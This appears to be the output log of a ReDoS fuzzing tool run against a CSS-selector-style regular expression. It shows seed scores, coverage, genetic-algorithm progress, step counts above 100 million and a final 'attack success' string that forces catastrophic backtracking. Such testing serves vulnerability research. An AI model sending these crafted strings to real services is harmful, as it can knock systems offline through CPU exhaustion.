(?:[\w\-\\.#]+)+(?:\[\w+?=([\'"])?(?:\\\1|.)+?\1\])?|\*|>
9: <9 : 8.5 : [><11 : 6.333333333333333 : [>><16 : 9.0 : [\><18 : 7.25 : [\[><19 : 6.4 : [\[_><28 : 6.833333333333333 : [\[_=><33 : 8.142857142857142 : [\[_="><35 : 10.8 : [\[_="\'"><37 : 5.2727272727272725 : [\[_="\'"]>
===Initiate End===
Node Coverage: 37/37
find attack string when cross
===Genetic Algorithm End===
Node Coverage: 37/37
Vulnerable: \[_="\"\[_="\"\[_="\"'\[;wa:NXIh}1L\[_="\"\"\[_="\"\[_="\"'\[="="|?=`|>_$'?|\[_="\"\[_="\"\[_="\"'\[="E9d7FeE\[65494486850831990?`#{%;&+?<.-#!&<[)[<+)_\""_=""[\[_='"\"="qkdA=?|\*|>"\'\"'_="
100201 : 527.3736842105263 : \[_="\"\[_="\"\[_="\"'\[;wa:NXIh}1L\[_="\"\"\[_="\"\[_="\"'\[="="|?=`|>_$'?|\[_="\"\[_="\"\[_="\"'\[="E9d7FeE\[65494486850831990?`#{%;&+?<.-#!&<[)[<+)_\""_=""[\[_='"\"="qkdA=?|\*|>"\'\"'_="
100070 : 1667.8333333333333 : \[_="\"\\"\\"'\"\"\\"\\"'\"="|?=`|>_$'?|\[_\"\[_\"\[_="\"'\
1000080 : \[_="\"\\"\\"\"\\"\\"'\"\"\\"\\"'\"="|?=`|>_$'?|\[_\"\[_\"\[_="\"'\
1000158 : 7 : \[_="\"\\"\\"\"\\"\\"\"\\"\\"\"\\"\\"\"\\"\\"\"\\"\\"\"\\"\\"\"\\"\\"\"\\"\\"'\"\"\\"\\"'\"="|?=`|>_$'?|\[_\"\[_\"\[_="\"'\
100000152 : \[_="\"\\"\\"\"\\"\\"\"\\"\\"\"\\"\\"\"\\"\\"\"\\"\\"\"\\"\\"\"\\"\\"\"\\"\\"'\"\"\\"\\"'\"="|?=`|>_$'?|\[_\"\[_\"\[_="\"'\
TIME: 6.168484111 (s)
Attack success, attack string is:
\[_="\"\\"\\"\"\\"\\"\"\\"\\"\"\\"\\"\"\\"\\"\"\\"\\"\"\\"\\"\"\\"\\"\"\\"\\"'\"\"\\"\\"'\"="|?=`|>_$'?|\[_\"\[_\"\[_="\"'\
